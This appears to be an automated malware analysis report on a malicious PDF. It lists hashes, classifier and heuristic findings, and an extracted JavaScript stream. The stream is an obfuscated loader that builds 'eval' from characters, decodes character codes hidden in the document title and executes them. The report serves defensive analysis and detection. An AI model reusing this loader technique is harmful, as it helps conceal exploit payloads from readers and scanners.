Malicious PDF — malware analysis report

Static analysis result for SHA-256 b6a277e8e4589e3c…

MALICIOUS

PDF

Size: 32.5 KB
Created: 2011-72-51 03:25:00
Authoring application: String.fromCharCode
First seen: 2012-11-25
MD5: 81ebfa8c9a10a08caa88be7088e8b2d8
SHA-1: 24f4a977c4749211bc3bd8fe582f80684e872c50
SHA-256: b6a277e8e4589e3cb51f8235d7058a7a044df29099d4449befb5c3c9274ff627
Risk Score: 114

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • JavaScript action (severity: low; 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    /Producer (String.fromCharCode)
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0x7F8C
Size: 372 bytes
SHA-256: 9795107c7a1c40da64a4d8a3389f1015d6b913e59657d022952605d3bc4374c1
Preview script (first 1,000 lines of the extracted script):
var g = this;
a=['l','v','e','a'];
e=g[a[2]+a[1]+a[3]+a[0]];
bqt=2011;
var $ = bqt-1979;
var vejxm="";
zued='his';
jqo='.tit';
e('uaohi=t'+zued+jqo+'le');
e(e('wll=t'+zued));
hbvj='.produ';
e('agu=t'+zued+hbvj+'cer');
oixr=e(agu);
nhyhk = uaohi.split(',');
for (i = 0; i < nhyhk.length; i++) {
	qbmo = e(nhyhk[i]);
	vejxm += oixr(qbmo);
}
e(vejxm);